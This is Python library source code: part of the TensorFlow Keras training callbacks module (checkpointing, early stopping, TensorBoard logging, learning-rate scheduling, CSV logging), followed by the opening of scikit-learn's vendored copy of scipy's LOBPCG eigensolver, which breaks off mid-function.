verbose=self.verbose,
stateful_metrics=self.stateful_metrics)
self.seen = 0
def on_batch_begin(self, batch, logs=None):
if self.seen < self.target:
self.log_values = []
def on_batch_end(self, batch, logs=None):
logs = logs or {}
batch_size = logs.get('size', 0)
if self.use_steps:
self.seen += 1
else:
self.seen += batch_size
for k in self.params['metrics']:
if k in logs:
self.log_values.append((k, logs[k]))
# Skip progbar update for the last batch;
# will be handled by on_epoch_end.
if self.verbose and self.seen < self.target:
self.progbar.update(self.seen, self.log_values)
def on_epoch_end(self, epoch, logs=None):
logs = logs or {}
for k in self.params['metrics']:
if k in logs:
self.log_values.append((k, logs[k]))
if self.verbose:
self.progbar.update(self.seen, self.log_values)
@tf_export('keras.callbacks.History')
class History(Callback):
"""Callback that records events into a `History` object.
This callback is automatically applied to
every Keras model. The `History` object
gets returned by the `fit` method of models.
"""
def on_train_begin(self, logs=None):
self.epoch = []
self.history = {}
def on_epoch_end(self, epoch, logs=None):
logs = logs or {}
self.epoch.append(epoch)
for k, v in logs.items():
self.history.setdefault(k, []).append(v)
@tf_export('keras.callbacks.ModelCheckpoint')
class ModelCheckpoint(Callback):
"""Save the model after every epoch.
`filepath` can contain named formatting options,
which will be filled the value of `epoch` and
keys in `logs` (passed in `on_epoch_end`).
For example: if `filepath` is `weights.{epoch:02d}-{val_loss:.2f}.hdf5`,
then the model checkpoints will be saved with the epoch number and
the validation loss in the filename.
Arguments:
filepath: string, path to save the model file.
monitor: quantity to monitor.
verbose: verbosity mode, 0 or 1.
save_best_only: if `save_best_only=True`,
the latest best model according to
the quantity monitored will not be overwritten.
mode: one of {auto, min, max}.
If `save_best_only=True`, the decision
to overwrite the current save file is made
based on either the maximization or the
minimization of the monitored quantity. For `val_acc`,
this should be `max`, for `val_loss` this should
be `min`, etc. In `auto` mode, the direction is
automatically inferred from the name of the monitored quantity.
save_weights_only: if True, then only the model's weights will be
saved (`model.save_weights(filepath)`), else the full model
is saved (`model.save(filepath)`).
period: Interval (number of epochs) between checkpoints.
"""
def __init__(self,
filepath,
monitor='val_loss',
verbose=0,
save_best_only=False,
save_weights_only=False,
mode='auto',
period=1):
super(ModelCheckpoint, self).__init__()
self.monitor = monitor
self.verbose = verbose
self.filepath = filepath
self.save_best_only = save_best_only
self.save_weights_only = save_weights_only
self.period = period
self.epochs_since_last_save = 0
if mode not in ['auto', 'min', 'max']:
logging.warning('ModelCheckpoint mode %s is unknown, '
'fallback to auto mode.', mode)
mode = 'auto'
if mode == 'min':
self.monitor_op = np.less
self.best = np.Inf
elif mode == 'max':
self.monitor_op = np.greater
self.best = -np.Inf
else:
if 'acc' in self.monitor or self.monitor.startswith('fmeasure'):
self.monitor_op = np.greater
self.best = -np.Inf
else:
self.monitor_op = np.less
self.best = np.Inf
def on_epoch_end(self, epoch, logs=None):
logs = logs or {}
self.epochs_since_last_save += 1
if self.epochs_since_last_save >= self.period:
self.epochs_since_last_save = 0
filepath = self.filepath.format(epoch=epoch + 1, **logs)
if self.save_best_only:
current = logs.get(self.monitor)
if current is None:
logging.warning('Can save best model only with %s available, '
'skipping.', self.monitor)
else:
if self.monitor_op(current, self.best):
if self.verbose > 0:
print('\nEpoch %05d: %s improved from %0.5f to %0.5f,'
' saving model to %s' % (epoch + 1, self.monitor, self.best,
current, filepath))
self.best = current
if self.save_weights_only:
self.model.save_weights(filepath, overwrite=True)
else:
self.model.save(filepath, overwrite=True)
else:
if self.verbose > 0:
print('\nEpoch %05d: %s did not improve from %0.5f' %
(epoch + 1, self.monitor, self.best))
else:
if self.verbose > 0:
print('\nEpoch %05d: saving model to %s' % (epoch + 1, filepath))
if self.save_weights_only:
self.model.save_weights(filepath, overwrite=True)
else:
self.model.save(filepath, overwrite=True)
@tf_export('keras.callbacks.EarlyStopping')
class EarlyStopping(Callback):
"""Stop training when a monitored quantity has stopped improving.
Arguments:
monitor: quantity to be monitored.
min_delta: minimum change in the monitored quantity
to qualify as an improvement, i.e. an absolute
change of less than min_delta, will count as no
improvement.
patience: number of epochs with no improvement
after which training will be stopped.
verbose: verbosity mode.
mode: one of {auto, min, max}. In `min` mode,
training will stop when the quantity
monitored has stopped decreasing; in `max`
mode it will stop when the quantity
monitored has stopped increasing; in `auto`
mode, the direction is automatically inferred
from the name of the monitored quantity.
baseline: baseline value for the monitored quantity.
Training will stop if the model doesn't show improvement over the
baseline.
"""
def __init__(self,
monitor='val_loss',
min_delta=0,
patience=0,
verbose=0,
mode='auto',
baseline=None):
super(EarlyStopping, self).__init__()
self.monitor = monitor
self.patience = patience
self.verbose = verbose
self.baseline = baseline
self.min_delta = abs(min_delta)
self.wait = 0
self.stopped_epoch = 0
if mode not in ['auto', 'min', 'max']:
logging.warning('EarlyStopping mode %s is unknown, '
'fallback to auto mode.', mode)
mode = 'auto'
if mode == 'min':
self.monitor_op = np.less
elif mode == 'max':
self.monitor_op = np.greater
else:
if 'acc' in self.monitor:
self.monitor_op = np.greater
else:
self.monitor_op = np.less
if self.monitor_op == np.greater:
self.min_delta *= 1
else:
self.min_delta *= -1
def on_train_begin(self, logs=None):
# Allow instances to be re-used
self.wait = 0
self.stopped_epoch = 0
if self.baseline is not None:
self.best = self.baseline
else:
self.best = np.Inf if self.monitor_op == np.less else -np.Inf
def on_epoch_end(self, epoch, logs=None):
current = logs.get(self.monitor)
if current is None:
logging.warning('Early stopping conditioned on metric `%s` '
'which is not available. Available metrics are: %s',
self.monitor, ','.join(list(logs.keys())))
return
if self.monitor_op(current - self.min_delta, self.best):
self.best = current
self.wait = 0
else:
self.wait += 1
if self.wait >= self.patience:
self.stopped_epoch = epoch
self.model.stop_training = True
def on_train_end(self, logs=None):
if self.stopped_epoch > 0 and self.verbose > 0:
print('Epoch %05d: early stopping' % (self.stopped_epoch + 1))
@tf_export('keras.callbacks.RemoteMonitor')
class RemoteMonitor(Callback):
"""Callback used to stream events to a server.
Requires the `requests` library.
Events are sent to `root + '/publish/epoch/end/'` by default. Calls are
HTTP POST, with a `data` argument which is a
JSON-encoded dictionary of event data.
If send_as_json is set to True, the content type of the request will be
application/json. Otherwise the serialized JSON will be sent within a form.
Arguments:
root: String; root url of the target server.
path: String; path relative to `root` to which the events will be sent.
field: String; JSON field under which the data will be stored.
The field is used only if the payload is sent within a form
(i.e. send_as_json is set to False).
headers: Dictionary; optional custom HTTP headers.
send_as_json: Boolean; whether the request should be
sent as application/json.
"""
def __init__(self,
root='http://localhost:9000',
path='/publish/epoch/end/',
field='data',
headers=None,
send_as_json=False):
super(RemoteMonitor, self).__init__()
self.root = root
self.path = path
self.field = field
self.headers = headers
self.send_as_json = send_as_json
def on_epoch_end(self, epoch, logs=None):
if requests is None:
raise ImportError('RemoteMonitor requires the `requests` library.')
logs = logs or {}
send = {}
send['epoch'] = epoch
for k, v in logs.items():
send[k] = v
try:
if self.send_as_json:
requests.post(self.root + self.path, json=send, headers=self.headers)
else:
requests.post(
self.root + self.path, {self.field: json.dumps(send)},
headers=self.headers)
except requests.exceptions.RequestException:
logging.warning('Warning: could not reach RemoteMonitor '
'root server at ' + str(self.root))
@tf_export('keras.callbacks.LearningRateScheduler')
class LearningRateScheduler(Callback):
"""Learning rate scheduler.
Arguments:
schedule: a function that takes an epoch index as input
(integer, indexed from 0) and returns a new
learning rate as output (float).
verbose: int. 0: quiet, 1: update messages.
"""
def __init__(self, schedule, verbose=0):
super(LearningRateScheduler, self).__init__()
self.schedule = schedule
self.verbose = verbose
def on_epoch_begin(self, epoch, logs=None):
if not hasattr(self.model.optimizer, 'lr'):
raise ValueError('Optimizer must have a "lr" attribute.')
try: # new API
lr = float(K.get_value(self.model.optimizer.lr))
lr = self.schedule(epoch, lr)
except TypeError: # Support for old API for backward compatibility
lr = self.schedule(epoch)
if not isinstance(lr, (float, np.float32, np.float64)):
raise ValueError('The output of the "schedule" function '
'should be float.')
K.set_value(self.model.optimizer.lr, lr)
if self.verbose > 0:
print('\nEpoch %05d: LearningRateScheduler reducing learning '
'rate to %s.' % (epoch + 1, lr))
@tf_export('keras.callbacks.TensorBoard')
class TensorBoard(Callback):
# pylint: disable=line-too-long
"""Tensorboard basic visualizations.
This callback writes a log for TensorBoard, which allows
you to visualize dynamic graphs of your training and test
metrics, as well as activation histograms for the different
layers in your model.
TensorBoard is a visualization tool provided with TensorFlow.
If you have installed TensorFlow with pip, you should be able
to launch TensorBoard from the command line:
```sh
tensorboard --logdir=/full_path_to_your_logs
```
You can find more information about TensorBoard
[here](https://www.tensorflow.org/get_started/summaries_and_tensorboard).
Arguments:
log_dir: the path of the directory where to save the log
files to be parsed by TensorBoard.
histogram_freq: frequency (in epochs) at which to compute activation
and weight histograms for the layers of the model. If set to 0,
histograms won't be computed. Validation data (or split) must be
specified for histogram visualizations.
write_graph: whether to visualize the graph in TensorBoard.
The log file can become quite large when
write_graph is set to True.
write_grads: whether to visualize gradient histograms in TensorBoard.
`histogram_freq` must be greater than 0.
batch_size: size of batch of inputs to feed to the network
for histograms computation.
write_images: whether to write model weights to visualize as
image in TensorBoard.
embeddings_freq: frequency (in epochs) at which selected embedding
layers will be saved.
embeddings_layer_names: a list of names of layers to keep eye on. If
None or empty list all the embedding layer will be watched.
embeddings_metadata: a dictionary which maps layer name to a file name
in which metadata for this embedding layer is saved. See the
[details](https://www.tensorflow.org/how_tos/embedding_viz/#metadata_optional)
about metadata files format. In case if the same metadata file is
used for all embedding layers, string can be passed.
"""
# pylint: enable=line-too-long
def __init__(self,
log_dir='./logs',
histogram_freq=0,
batch_size=32,
write_graph=True,
write_grads=False,
write_images=False):
super(TensorBoard, self).__init__()
self.log_dir = log_dir
self.histogram_freq = histogram_freq
self.merged = None
self.write_graph = write_graph
self.write_grads = write_grads
self.write_images = write_images
self.batch_size = batch_size
self._current_batch = 0
# abstracted writer class to be able to stub for testing
self._writer_class = tf_summary.FileWriter
def set_model(self, model):
"""Sets Keras model and creates summary ops."""
self.model = model
self.sess = K.get_session()
if self.histogram_freq and self.merged is None:
for layer in self.model.layers:
for weight in layer.weights:
mapped_weight_name = weight.name.replace(':', '_')
tf_summary.histogram(mapped_weight_name, weight)
if self.write_images:
w_img = array_ops.squeeze(weight)
shape = K.int_shape(w_img)
if len(shape) == 2: # dense layer kernel case
if shape[0] > shape[1]:
w_img = array_ops.transpose(w_img)
shape = K.int_shape(w_img)
w_img = array_ops.reshape(w_img, [1, shape[0], shape[1], 1])
elif len(shape) == 3: # convnet case
if K.image_data_format() == 'channels_last':
# switch to channels_first to display
# every kernel as a separate image
w_img = array_ops.transpose(w_img, perm=[2, 0, 1])
shape = K.int_shape(w_img)
w_img = array_ops.reshape(w_img,
[shape[0], shape[1], shape[2], 1])
elif len(shape) == 1: # bias case
w_img = array_ops.reshape(w_img, [1, shape[0], 1, 1])
else:
# not possible to handle 3D convnets etc.
continue
shape = K.int_shape(w_img)
assert len(shape) == 4 and shape[-1] in [1, 3, 4]
tf_summary.image(mapped_weight_name, w_img)
if self.write_grads:
for weight in layer.trainable_weights:
mapped_weight_name = weight.name.replace(':', '_')
grads = model.optimizer.get_gradients(model.total_loss, weight)
def is_indexed_slices(grad):
return type(grad).__name__ == 'IndexedSlices'
grads = [grad.values if is_indexed_slices(grad) else grad
for grad in grads]
tf_summary.histogram('{}_grad'.format(mapped_weight_name), grads)
if hasattr(layer, 'output'):
tf_summary.histogram('{}_out'.format(layer.name), layer.output)
self.merged = tf_summary.merge_all()
if self.write_graph:
self.writer = self._writer_class(self.log_dir, self.sess.graph)
else:
self.writer = self._writer_class(self.log_dir)
def _fetch_callback(self, summary):
self.writer.add_summary(
summary, self._epoch + self._current_batch / self._batches_per_epoch)
self._current_batch += 1
def on_epoch_begin(self, epoch, logs=None):
"""Add histogram op to Model test_function callbacks, reset batch count."""
if not self.validation_data and self.histogram_freq:
raise ValueError('If printing histograms, validation_data must be '
'provided, and cannot be a generator.')
if self.histogram_freq and epoch % self.histogram_freq == 0:
self._epoch = epoch
self._current_batch = 0
self._batches_per_epoch = math.ceil(
self.validation_data[0].shape[0] / self.batch_size)
if self.merged not in self.model.test_function.fetches:
self.model.test_function.fetches.append(self.merged)
self.model.test_function.fetch_callbacks[
self.merged] = self._fetch_callback
def on_epoch_end(self, epoch, logs=None):
"""Checks if summary ops should run next epoch, logs scalar summaries."""
logs = logs or {}
if self.histogram_freq and self.histogram_freq > 1:
if self.merged in self.model.test_function.fetches:
self.model.test_function.fetches.remove(self.merged)
if self.merged in self.model.test_function.fetch_callbacks:
self.model.test_function.fetch_callbacks.pop(self.merged)
for name, value in logs.items():
if name in ['batch', 'size']:
continue
summary = tf_summary.Summary()
summary_value = summary.value.add()
summary_value.simple_value = value.item()
summary_value.tag = name
self.writer.add_summary(summary, epoch)
self.writer.flush()
def on_train_end(self, logs=None):
self.writer.close()
@tf_export('keras.callbacks.ReduceLROnPlateau')
class ReduceLROnPlateau(Callback):
"""Reduce learning rate when a metric has stopped improving.
Models often benefit from reducing the learning rate by a factor
of 2-10 once learning stagnates. This callback monitors a
quantity and if no improvement is seen for a 'patience' number
of epochs, the learning rate is reduced.
Example:
```python
reduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.2,
patience=5, min_lr=0.001)
model.fit(X_train, Y_train, callbacks=[reduce_lr])
```
Arguments:
monitor: quantity to be monitored.
factor: factor by which the learning rate will
be reduced. new_lr = lr * factor
patience: number of epochs with no improvement
after which learning rate will be reduced.
verbose: int. 0: quiet, 1: update messages.
mode: one of {auto, min, max}. In `min` mode,
lr will be reduced when the quantity
monitored has stopped decreasing; in `max`
mode it will be reduced when the quantity
monitored has stopped increasing; in `auto`
mode, the direction is automatically inferred
from the name of the monitored quantity.
min_delta: threshold for measuring the new optimum,
to only focus on significant changes.
cooldown: number of epochs to wait before resuming
normal operation after lr has been reduced.
min_lr: lower bound on the learning rate.
"""
def __init__(self,
monitor='val_loss',
factor=0.1,
patience=10,
verbose=0,
mode='auto',
min_delta=1e-4,
cooldown=0,
min_lr=0,
**kwargs):
super(ReduceLROnPlateau, self).__init__()
self.monitor = monitor
if factor >= 1.0:
raise ValueError('ReduceLROnPlateau ' 'does not support a factor >= 1.0.')
if 'epsilon' in kwargs:
min_delta = kwargs.pop('epsilon')
logging.warning('`epsilon` argument is deprecated and '
'will be removed, use `min_delta` instead.')
self.factor = factor
self.min_lr = min_lr
self.min_delta = min_delta
self.patience = patience
self.verbose = verbose
self.cooldown = cooldown
self.cooldown_counter = 0 # Cooldown counter.
self.wait = 0
self.best = 0
self.mode = mode
self.monitor_op = None
self._reset()
def _reset(self):
"""Resets wait counter and cooldown counter.
"""
if self.mode not in ['auto', 'min', 'max']:
logging.warning('Learning Rate Plateau Reducing mode %s is unknown, '
'fallback to auto mode.', self.mode)
self.mode = 'auto'
if (self.mode == 'min' or
(self.mode == 'auto' and 'acc' not in self.monitor)):
self.monitor_op = lambda a, b: np.less(a, b - self.min_delta)
self.best = np.Inf
else:
self.monitor_op = lambda a, b: np.greater(a, b + self.min_delta)
self.best = -np.Inf
self.cooldown_counter = 0
self.wait = 0
def on_train_begin(self, logs=None):
self._reset()
def on_epoch_end(self, epoch, logs=None):
logs = logs or {}
logs['lr'] = K.get_value(self.model.optimizer.lr)
current = logs.get(self.monitor)
if current is None:
logging.warning('Reduce LR on plateau conditioned on metric `%s` '
'which is not available. Available metrics are: %s',
self.monitor, ','.join(list(logs.keys())))
else:
if self.in_cooldown():
self.cooldown_counter -= 1
self.wait = 0
if self.monitor_op(current, self.best):
self.best = current
self.wait = 0
elif not self.in_cooldown():
self.wait += 1
if self.wait >= self.patience:
old_lr = float(K.get_value(self.model.optimizer.lr))
if old_lr > self.min_lr:
new_lr = old_lr * self.factor
new_lr = max(new_lr, self.min_lr)
K.set_value(self.model.optimizer.lr, new_lr)
if self.verbose > 0:
print('\nEpoch %05d: ReduceLROnPlateau reducing learning '
'rate to %s.' % (epoch + 1, new_lr))
self.cooldown_counter = self.cooldown
self.wait = 0
def in_cooldown(self):
return self.cooldown_counter > 0
@tf_export('keras.callbacks.CSVLogger')
class CSVLogger(Callback):
"""Callback that streams epoch results to a csv file.
Supports all values that can be represented as a string,
including 1D iterables such as np.ndarray.
Example:
```python
csv_logger = CSVLogger('training.log')
model.fit(X_train, Y_train, callbacks=[csv_logger])
```
Arguments:
filename: filename of the csv file, e.g. 'run/log.csv'.
separator: string used to separate elements in the csv file.
append: True: append if file exists (useful for continuing
training). False: overwrite existing file,
"""
def __init__(self, filename, separator=',', append=False):
self.sep = separator
self.filename = filename
self.append = append
self.writer = None
self.keys = None
self.append_header = True
self.file_flags = 'b' if six.PY2 and os.name == 'nt' else ''
super(CSVLogger, self).__init__()
def on_train_begin(self, logs=None):
if self.append:
if os.path.exists(self.filename):
with open(self.filename, 'r' + self.file_flags) as f:
self.append_header = not bool(len(f.readline()))
self.csv_file = open(self.filename, 'a' + self.file_flags)
else:
self.csv_file = open(self.filename, 'w' + self.file_flags)
def on_epoch_end(self, epoch, logs=None):
logs = logs or {}
def handle_value(k):
is_zero_dim_ndarray = isinstance(k, np.ndarray) and k.ndim == 0
if isinstance(k, six.string_types):
return k
elif isinstance(k, Iterable) and not is_zero_dim_ndarray:
return '"[%s]"' % (', '.join(map(str, k)))
else:
return k
if self.keys is None:
self.keys = sorted(logs.keys())
if self.model.stop_training:
# We set NA so that csv parsers do not fail for this last epoch.
logs = dict([(k, logs[k]) if k in logs else (k, 'NA') for k in self.keys])
if not self.writer:
class CustomDialect(csv.excel):
delimiter = self.sep
self.writer = csv.DictWriter(
self.csv_file,
fieldnames=['epoch'] + self.keys,
dialect=CustomDialect)
if self.append_header:
self.writer.writeheader()
row_dict = OrderedDict({'epoch': epoch})
row_dict.update((key, handle_value(logs[key])) for key in self.keys)
self.writer.writerow(row_dict)
self.csv_file.flush()
def on_train_end(self, logs=None):
self.csv_file.close()
self.writer = None
@tf_export('keras.callbacks.LambdaCallback')
class LambdaCallback(Callback):
r"""Callback for creating simple, custom callbacks on-the-fly.
This callback is constructed with anonymous functions that will be called
at the appropriate time. Note that the callbacks expects positional
arguments, as:
- `on_epoch_begin` and `on_epoch_end` expect two positional arguments:
`epoch`, `logs`
- `on_batch_begin` and `on_batch_end` expect two positional arguments:
`batch`, `logs`
- `on_train_begin` and `on_train_end` expect one positional argument:
`logs`
Arguments:
on_epoch_begin: called at the beginning of every epoch.
on_epoch_end: called at the end of every epoch.
on_batch_begin: called at the beginning of every batch.
on_batch_end: called at the end of every batch.
on_train_begin: called at the beginning of model training.
on_train_end: called at the end of model training.
Example:
```python
# Print the batch number at the beginning of every batch.
batch_print_callback = LambdaCallback(
on_batch_begin=lambda batch,logs: print(batch))
# Stream the epoch loss to a file in JSON format. The file content
# is not well-formed JSON but rather has a JSON object per line.
import json
json_log = open('loss_log.json', mode='wt', buffering=1)
json_logging_callback = LambdaCallback(
on_epoch_end=lambda epoch, logs: json_log.write(
json.dumps({'epoch': epoch, 'loss': logs['loss']}) + '\n'),
on_train_end=lambda logs: json_log.close()
)
# Terminate some processes after having finished model training.
processes = ...
cleanup_callback = LambdaCallback(
on_train_end=lambda logs: [
p.terminate() for p in processes if p.is_alive()])
model.fit(...,
callbacks=[batch_print_callback,
json_logging_callback,
cleanup_callback])
```
"""
def __init__(self,
on_epoch_begin=None,
on_epoch_end=None,
on_batch_begin=None,
on_batch_end=None,
on_train_begin=None,
on_train_end=None,
**kwargs):
super(LambdaCallback, self).__init__()
self.__dict__.update(kwargs)
if on_epoch_begin is not None:
self.on_epoch_begin = on_epoch_begin
else:
self.on_epoch_begin = lambda epoch, logs: None
if on_epoch_end is not None:
self.on_epoch_end = on_epoch_end
else:
self.on_epoch_end = lambda epoch, logs: None
if on_batch_begin is not None:
self.on_batch_begin = on_batch_begin
else:
self.on_batch_begin = lambda batch, logs: None
if on_batch_end is not None:
self.on_batch_end = on_batch_end
else:
self.on_batch_end = lambda batch, logs: None
if on_train_begin is not None:
self.on_train_begin = on_train_begin
else:
self.on_train_begin = lambda logs: None
if on_train_end is not None:
self.on_train_end = on_train_end
else:
self.on_train_end = lambda logs: None
| |
"""
scikit-learn copy of scipy/sparse/linalg/eigen/lobpcg/lobpcg.py v1.7.1
to be deleted after scipy 1.3.0 becomes a dependency in scikit-lean
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Locally Optimal Block Preconditioned Conjugate Gradient Method (LOBPCG).
References
----------
.. [1] A. V. Knyazev (2001),
Toward the Optimal Preconditioned Eigensolver: Locally Optimal
Block Preconditioned Conjugate Gradient Method.
SIAM Journal on Scientific Computing 23, no. 2,
pp. 517-541. :doi:`10.1137/S1064827500366124`
.. [2] A. V. Knyazev, I. Lashuk, M. E. Argentati, and E. Ovchinnikov (2007),
Block Locally Optimal Preconditioned Eigenvalue Xolvers (BLOPEX)
in hypre and PETSc. :arxiv:`0705.2626`
.. [3] A. V. Knyazev's C and MATLAB implementations:
https://github.com/lobpcg/blopex
"""
import numpy as np
from scipy.linalg import (inv, eigh, cho_factor, cho_solve, cholesky,
LinAlgError)
from scipy.sparse.linalg import aslinearoperator
from numpy import block as bmat
__all__ = ['lobpcg']
def _report_nonhermitian(M, name):
"""
Report if `M` is not a Hermitian matrix given its type.
"""
from scipy.linalg import norm
md = M - M.T.conj()
nmd = norm(md, 1)
tol = 10 * np.finfo(M.dtype).eps
tol = max(tol, tol * norm(M, 1))
if nmd > tol:
print('matrix %s of the type %s is not sufficiently Hermitian:'
% (name, M.dtype))
print('condition: %.e < %e' % (nmd, tol))
def _as2d(ar):
"""
If the input array is 2D return it, if it is 1D, append a dimension,
making it a column vector.
"""
if ar.ndim == 2:
return ar
else: # Assume 1!
aux = np.array(ar, copy=False)
aux.shape = (ar.shape[0], 1)
return aux
def _makeOperator(operatorInput, expectedShape):
"""Takes a dense numpy array or a sparse matrix or
a function and makes an operator performing matrix * blockvector
products."""
if operatorInput is None:
return None
else:
operator = aslinearoperator(operatorInput)
if operator.shape != expectedShape:
raise ValueError('operator has invalid shape')
return operator
def _applyConstraints(blockVectorV, factYBY, blockVectorBY, blockVectorY):
"""Changes blockVectorV in place."""
YBV = np.dot(blockVectorBY.T.conj(), blockVectorV)
tmp = cho_solve(factYBY, YBV)
blockVectorV -= np.dot(blockVectorY, tmp)
def _b_orthonormalize(B, blockVectorV, blockVectorBV=None, retInvR=False):
"""B-orthonormalize the given block vector using Cholesky."""
normalization = blockVectorV.max(axis=0)+np.finfo(blockVectorV.dtype).eps
blockVectorV = blockVectorV / normalization
if blockVectorBV is None:
if B is not None:
blockVectorBV = B(blockVectorV)
else:
blockVectorBV = blockVectorV # Shared data!!!
else:
blockVectorBV = blockVectorBV / normalization
VBV = np.matmul(blockVectorV.T.conj(), blockVectorBV)
try:
# VBV is a Cholesky factor from now on...
VBV = cholesky(VBV, overwrite_a=True)
VBV = inv(VBV, overwrite_a=True)
blockVectorV = np.matmul(blockVectorV, VBV)
# blockVectorV = (cho_solve((VBV.T, True), blockVectorV.T)).T
if B is not None:
blockVectorBV = np.matmul(blockVectorBV, VBV)
# blockVectorBV = (cho_solve((VBV.T, True), blockVectorBV.T)).T
else:
blockVectorBV = None
except LinAlgError:
#raise ValueError('Cholesky has failed')
blockVectorV = None
blockVectorBV = None
VBV = None
if retInvR:
return blockVectorV, blockVectorBV, VBV, normalization
else:
return blockVectorV, blockVectorBV
def _get_indx(_lambda, num, largest):
"""Get `num` indices into `_lambda` depending on `largest` option."""
ii = np.argsort(_lambda)
if largest:
ii = ii[:-num-1:-1]
else:
ii = ii[:num]
return ii
def lobpcg(A, X,
B=None, M=None, Y=None,
tol=None, maxiter=None,
largest=True, verbosityLevel=0,
retLambdaHistory=False, retResidualNormsHistory=False):
"""Locally Optimal Block Preconditioned Conjugate Gradient Method (LOBPCG)
LOBPCG is a preconditioned eigensolver for large symmetric positive
definite (SPD) generalized eigenproblems.
Parameters
----------
A : {sparse matrix, dense matrix, LinearOperator}
The symmetric linear operator of the problem, usually a
sparse matrix. Often called the "stiffness matrix".
X : ndarray, float32 or float64
Initial approximation to the ``k`` eigenvectors (non-sparse). If `A`
has ``shape=(n,n)`` then `X` should have shape ``shape=(n,k)``.
B : {dense matrix, sparse matrix, LinearOperator}, optional
The right hand side operator in a generalized eigenproblem.
By default, ``B = Identity``. Often called the "mass matrix".
M : {dense matrix, sparse matrix, LinearOperator}, optional
Preconditioner to `A`; by default ``M = Identity``.
`M` should approximate the inverse of `A`.
Y : ndarray, float32 or float64, optional
n-by-sizeY matrix of constraints (non-sparse), sizeY < n
The iterations will be performed in the B-orthogonal complement
of the column-space of Y. Y must be full rank.
tol : scalar, optional
Solver tolerance (stopping criterion).
The default is ``tol=n*sqrt(eps)``.
maxiter : int, optional
Maximum number of iterations. The default is ``maxiter = 20``.
largest : bool, optional
When True, solve for the largest eigenvalues, otherwise the smallest.
verbosityLevel : int, optional
Controls solver output. The default is ``verbosityLevel=0``.
retLambdaHistory : bool, optional
Whether to return eigenvalue history. Default is False.
retResidualNormsHistory : bool, optional
Whether to return history of residual norms. Default is False.
Returns
-------
w : ndarray
Array of ``k`` eigenvalues
v : ndarray
An array of ``k`` eigenvectors. `v` has the same shape as `X`.
lambdas : list of ndarray, optional
The eigenvalue history, if `retLambdaHistory` is True.
rnorms : list of ndarray, optional
The history of residual norms, if `retResidualNormsHistory` is True.
Notes
-----
If both ``retLambdaHistory`` and ``retResidualNormsHistory`` are True,
the return tuple has the following format
``(lambda, V, lambda history, residual norms history)``.
In the following ``n`` denotes the matrix size and ``m`` the number
of required eigenvalues (smallest or largest).
The LOBPCG code internally solves eigenproblems of the size ``3m`` on every
iteration by calling the "standard" dense eigensolver, so if ``m`` is not
small enough compared to ``n``, it does not make sense to call the LOBPCG
code, but rather one should use the "standard" eigensolver, e.g. numpy or
scipy function in this case.
If one calls the LOBPCG algorithm for ``5m > n``, it will most likely break
internally, so the code tries to call the standard function instead.
It is not that ``n`` should be large for the LOBPCG to work, but rather the
ratio ``n / m`` should be large. It you call LOBPCG with ``m=1``
and ``n=10``, it works though ``n`` is small. The method is intended
for extremely large ``n / m`` [4]_.
The convergence speed depends basically on two factors:
1. How well relatively separated the seeking eigenvalues are from the rest
of the eigenvalues. One can try to vary ``m`` to make this better.
2. How well conditioned the problem is. This can be changed by using proper
preconditioning. For example, a rod vibration test problem (under tests
directory) is ill-conditioned for large ``n``, so convergence will be
slow, unless efficient preconditioning is used. For this specific
problem, a good simple preconditioner function would be a linear solve
for `A`, which is easy to code since A is tridiagonal.
References
----------
.. [1] A. V. Knyazev (2001),
Toward the Optimal Preconditioned Eigensolver: Locally Optimal
Block Preconditioned Conjugate Gradient Method.
SIAM Journal on Scientific Computing 23, no. 2,
pp. 517-541. :doi:`10.1137/S1064827500366124`
.. [2] A. V. Knyazev, I. Lashuk, M. E. Argentati, and E. Ovchinnikov
(2007), Block Locally Optimal Preconditioned Eigenvalue Xolvers
(BLOPEX) in hypre and PETSc. :arxiv:`0705.2626`
.. [3] A. V. Knyazev's C and MATLAB implementations:
https://bitbucket.org/joseroman/blopex
.. [4] S. Yamada, T. Imamura, T. Kano, and M. Machida (2006),
High-performance computing for exact numerical approaches to
quantum many-body problems on the earth simulator. In Proceedings
of the 2006 ACM/IEEE Conference on Supercomputing.
:doi:`10.1145/1188455.1188504`
Examples
--------
Solve ``A x = lambda x`` with constraints and preconditioning.
>>> import numpy as np
>>> from scipy.sparse import spdiags, issparse
>>> from scipy.sparse.linalg import lobpcg, LinearOperator
>>> n = 100
>>> vals = np.arange(1, n + 1)
>>> A = spdiags(vals, 0, n, n)
>>> A.toarray()
array([[ 1., 0., 0., ..., 0., 0., 0.],
[ 0., 2., 0., ..., 0., 0., 0.],
[ 0., 0., 3., ..., 0., 0., 0.],
...,
[ 0., 0., 0., ..., 98., 0., 0.],
[ 0., 0., 0., ..., 0., 99., 0.],
[ 0., 0., 0., ..., 0., 0., 100.]])
Constraints:
>>> Y = np.eye(n, 3)
Initial guess for eigenvectors, should have linearly independent
columns. Column dimension = number of requested eigenvalues.
>>> rng = np.random.default_rng()
>>> X = rng.random((n, 3))
Preconditioner in the inverse of A in this example:
>>> invA = spdiags([1./vals], 0, n, n)
The preconditiner must be defined by a function:
>>> def precond( x ):
... return invA @ x
The argument x of the preconditioner function is a matrix inside `lobpcg`,
thus the use of matrix-matrix product ``@``.
The preconditioner function is passed to lobpcg as a `LinearOperator`:
>>> M = LinearOperator(matvec=precond, matmat=precond,
... shape=(n, n), dtype=float)
Let us now solve the eigenvalue problem for the matrix A:
>>> eigenvalues, _ = lobpcg(A, X, Y=Y, M=M, largest=False)
>>> eigenvalues
array([4., 5., 6.])
Note that the vectors passed in Y are the eigenvectors of the 3 smallest
eigenvalues. The results returned are orthogonal to those.
"""
blockVectorX = X
blockVectorY = Y
residualTolerance = tol
if maxiter is None:
maxiter = 20
if blockVectorY is not None:
sizeY = blockVectorY.shape[1]
else:
sizeY = 0
# Block size.
if len(blockVectorX.shape) != 2:
raise ValueError('expected rank-2 array for argument X')
n, sizeX = blockVectorX.shape
if verbosityLevel:
aux = "Solving "
if B is None:
aux += "standard"
else:
aux += "generalized"
aux += " eigenvalue problem with"
if M is None:
aux += "out"
aux += " preconditioning\n\n"
aux += "matrix size %d\n" % n
aux += "block size %d\n\n" % sizeX
if blockVectorY is None:
aux += "No constraints\n\n"
else:
if sizeY > 1:
aux += "%d constraints\n\n" % sizeY
else:
aux += "%d constraint\n\n" % sizeY
print(aux)
A = _makeOperator(A, (n, n))
B = _makeOperator(B, (n, n))
M = _makeOperator(M, (n, n))
if (n - sizeY) < (5 * sizeX):
# warn('The problem size is small compared to the block size.' \
# ' Using dense eigensolver instead of LOBPCG.')
sizeX = min(sizeX, n)
if blockVectorY is not None:
